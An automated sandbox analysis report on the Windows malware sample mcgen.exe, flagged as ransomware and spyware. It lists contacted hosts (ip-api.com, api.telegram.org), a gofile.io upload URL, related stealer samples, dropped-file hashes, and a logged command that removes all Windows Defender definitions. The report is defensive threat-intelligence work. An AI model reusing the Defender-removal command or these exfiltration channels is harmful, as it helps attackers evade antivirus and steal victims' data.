                                                                                                                                                                                      https://github.com/urllib3/urllib3/issues/2920mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datamcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://yahoo.com/mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://account.bellmedia.cmcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://login.microsoftonline.commcgen.exe, 00000002.00000002.2531400042.000002C54FF08000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://html.spec.whatwg.org/multipage/mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.ifeng.com/mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsmcgen.exe, 00000002.00000002.2528839901.000002C54EE30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://www.zhihu.com/mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://www.rfc-editor.org/rfc/rfc8259#section-8.1mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://contoso.com/powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://oneget.orgXpowershell.exe, 0000003E.00000002.2321464313.000001FC3F289000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://crl.micft.cMicRosofpowershell.exe, 0000000B.00000002.2303077400.0000020A5B9AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://api.gofile.io/getServermcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          208.95.112.1
                                                                                                                                                                                                                          ip-api.comUnited States
                                                                                                                                                                                                                          53334TUT-ASUSfalse
                                                                                                                                                                                                                          149.154.167.220
                                                                                                                                                                                                                          api.telegram.orgUnited Kingdom
                                                                                                                                                                                                                          62041TELEGRAMRUfalse
                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                          Analysis ID:1583242
                                                                                                                                                                                                                          Start date and time:2025-01-02 09:21:09 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 12m 51s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Number of analysed new started processes analysed:126
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:mcgen.exe
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal100.rans.troj.adwa.spyw.expl.evad.winEXE@200/57@4/2
                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                          • Successful, ratio: 60%
                                                                                                                                                                                                                          HCA Information:Failed
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 142.250.184.195, 13.107.246.45, 4.175.87.197
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 4072 because it is empty
                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7524 because it is empty
                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                          03:22:03API Interceptor8x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                          03:22:05API Interceptor143x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          208.95.112.1intro.avi.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                          • ip-api.com/json/
                                                                                                                                                                                                                          AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                          • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                          L988Ph5sKX.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          kj93GnZHBS.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          ANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                                          • ip-api.com/json
                                                                                                                                                                                                                          vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                          • ip-api.com/xml
                                                                                                                                                                                                                          Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                          • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                          Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          149.154.167.220eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                            YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                              Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                  Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                                                                                                    file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                      XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                        Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                          iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              ip-api.comintro.avi.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              L988Ph5sKX.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              kj93GnZHBS.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              ANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              api.telegram.orgeP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                              YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                              Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                              vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                              Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                              file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                              XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                              Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                              iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                              Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              TELEGRAMRUeP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                              YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                              CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                              CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                              Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                              over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                              MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                              vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                              Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                              6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                              TUT-ASUSintro.avi.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              L988Ph5sKX.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              kj93GnZHBS.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              ANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI32122\VCRUNTIME140.dllAimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                                DChOtFdp9T.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                                                                                                  user.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                                                      YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                                        wp-s2.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                                                                                          wp-s2.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                                                                                            wp-cent.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                                                                                              wp-cent.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                                                                                                WTvNL75dCr.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:@...e...........................................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):692515
                                                                                                                                                                                                                                                                  Entropy (8bit):7.9276972423716785
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12288:a+0pc7Em5/b4/FEcuYM5diEa3PZiLE8EtXQBYdxBN/E97Eup47VvgubxU:aB/mBwEcuHudiQ8EtCYdxBNumDK
                                                                                                                                                                                                                                                                  MD5:CCF284654A1A8584E0E121EC3A20AD87
                                                                                                                                                                                                                                                                  SHA1:018CFE64EA353783ED1ECD95CCA3332BFE81CAB1
                                                                                                                                                                                                                                                                  SHA-256:4766E7D87AA6091742C7A920A906A98CF6EC2B7AC17400C545F85E705A794718
                                                                                                                                                                                                                                                                  SHA-512:55A241AB056A9F6366E5E6D7118B9B8E8644F48D33BFC5936774B4D14DCDF2711DBAED6F54FD1585EE76F6031D298B8D0A32E6F4CA8BB58DA356B0104FC78143
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..g.uWy...So..n.|...7....m.Lw;L.....m.r.....s.`r....H2.n.-..$.rD.D.(..H".h...{.}.zj.sN.....U.u_k.g=k.}N.....g.=...nc....?.2wzie._.:..+2~..a..r......W.........R..,4..}m$.c.........n...V.....w^...>F...XxU.....gx..(...*.^!....e..,.l._...YxI...M.1..^.U...3~........__.......s......+s..0~.-.f...'ly.-..3o^...7.d..R.....k`.So.../....&.O.a...b.kc....dK...?....%a.%o.....[.=...).U.G]?.-..Yx.g+[....,...G\_is..k.0~.u..c..-...|z..];a.?..8.....n..k.m..t...k....,<.....}s........c.....n.....s...R.Y(.[N..z../l{@.k...0.......j....k..=.wE..W...r.qn.)W....].m.o.9....r.....N.....Y7:...'.....J..O....%gGi..+y...+..1..9.[.>.c/.m.-.......].m;..;.x.e.K*./..v.tU...o..\.....}.....yQm..]..*.G_........r......m;...c.u.q--1.w...|.mG_T[...U.?..y.'+...%.Y.G......>Q.r..eLN.s.[......[8..{h..!.t.......^.@l|....8G...V..}p/...8..9...R....K..w[.*.-}b..q......b>...t...y..
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):894
                                                                                                                                                                                                                                                                  Entropy (8bit):3.1051564078442047
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:Q58KRBubdpkoPAGdjrRk9+MlWlLehW51ICJ:QOaqdmOFdjrW+kWResLII
                                                                                                                                                                                                                                                                  MD5:D032AC166E09D55C79BD5FA566263178
                                                                                                                                                                                                                                                                  SHA1:15107D3B1694036F300438516605D0C6AD697609
                                                                                                                                                                                                                                                                  SHA-256:C47674F6D645849DF52B13151C9D5717234426AC0E8590D1DF262B3815289401
                                                                                                                                                                                                                                                                  SHA-512:958D04B2847261899238F84DE407A4EDD446D5C78B3A417B3067D7930FBB279FF15F85A0F4EA0452E5C3A8CDCF9CC5E20239F14C290AC909F3B037270A328F61
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.a.n. .. 0.2. .. 2.0.2.5. .0.3.:.2.2.:.2.1.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.a.n. .. 0.2. .. 2.0.2.5. .0.3.:.2.2.:.2.1.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4be, 9 symbols, created Thu Jan 2 10:08:50 2025, 1st section name ".debug$S"
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1380
                                                                                                                                                                                                                                                                  Entropy (8bit):4.120116382214493
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:H6DW9DaEaHd8wK4aukNeI+ycuZhNPTakSm8PNnqSGd:mh9DKd5w1ulra3nqS2
                                                                                                                                                                                                                                                                  MD5:19CAE808B2C6261B982056127BAD7164
                                                                                                                                                                                                                                                                  SHA1:01C3F0EC1FA28BDB02C211931E0723FF75690551
                                                                                                                                                                                                                                                                  SHA-256:1A90D41775585F7C20DCBE3742AD3119F531F177B518E415F7687DE174AF0A4C
                                                                                                                                                                                                                                                                  SHA-512:FC5FFECC6C433EECEBE142A172CD81D1FE7681C9A107DF789D5A83BCBAF15FBFEBBD32698972CEAC5333005755BE9B6A830261F7E8BA6D7D7BBB88F41411C762
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:L....evg.............debug$S............................@..B.rsrc$01........X.......d...........@..@.rsrc$02........P...n...............@..@........W....c:\Users\user\AppData\Local\Temp\ppw2wipr\CSC774215641B8D46CBA5382B343227E316.TMP................X..*..{...d".@..........6.......C:\Users\user\AppData\Local\Temp\RES8ED.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.p.w.2.w.i.p.r...d.l.l.....(.....
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe
                                                                                                                                                                                                                                                                  File Type:RAR archive data, v5
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):725998
                                                                                                                                                                                                                                                                  Entropy (8bit):7.999758375184993
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:12288:PyJ1534s4KkTWDUWBDfkSk3zCXsk3gygbhyNCjwsJOYwqv1USSDvVUyn:Py15KTW1BM/Ocfygbhy8krSv1Ub7Vpn
                                                                                                                                                                                                                                                                  MD5:7C6A381B94995E293EE864DC0948D7A1
                                                                                                                                                                                                                                                                  SHA1:02D849DB33F8FE5E7BDAA3EBCB495A61286F5624
                                                                                                                                                                                                                                                                  SHA-256:2FA45C74E6E36F16A531EC3D9F5ACF00FBBC610A7E3DF9EC3647F0A243460040
                                                                                                                                                                                                                                                                  SHA-512:B8E40C25EA9938A557E67FAD0FEBEDF63F4D7D598173A815B0FA7F2D31FD8A1120CA57B143344D1BEC71F26D6D8BD9AC7BB5DC6604E0ADB3651FA5999C708BD2
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Preview:Rar!........!......H.rz..rd..|..Xh.jeQ'M.%.......P.v.w$...^Y..8.)J....B...6..I..T..iW>J...'.v.H...~h;.L.vY...zJ@.p..?<.......Y....N.}..[T...y]G..d.....#.[..P*.r.....".^.R.....@.`.r3.+..3.>..........5.:.L.#S;.....(I8..<.1..+....KG.v.&.E...Y....]B.K....=..5.........e./.L....v...\X..............6...X}r....S..J,.eL'..}L.$Iw...P g.R.rn...^......8..-.D4...3..KD[..,.^$G.-%3../QA...k1.I.K..;...`q'...x3...H...F.**w....2.x.v.L..#...@.W.......m#y....>Sk...>.4.cT......!P.#..3-......5`..0.;p.0..+...}.?X:....p....[...kYAF...3....Y=..AMX.A..AF.$&.Z..S. ..tY...BO...;.......xf.C...}..'J...d..h...Z.+..r.D...N..{rC`p....|..k(....oWq...Q.M.q..D.V.z....jz...}...y.@. .A.3.G% o.?."{.oM^..a.s....{.}g3X....Rb.1p..ed...].-?...E=`.y.......E.Q.My.$.....W.7.....c.^..4....Y.1..*..z-).:..s...O...X.H..A..xn#OD.bT....%.B........5b..^?h$w!.G...<........N..LLG....33..$.fG.T4E`.mrn......$.cQ0r...db.Vr~.,.. .d.)bXQ1.TY...0..s.f...(.J.1.7J.....t.?U.OI.y).....J....
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):120400
                                                                                                                                                                                                                                                                  Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                                                  MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                                                  SHA1:EF96D84B253041B090C243594F90938E9A487A9A
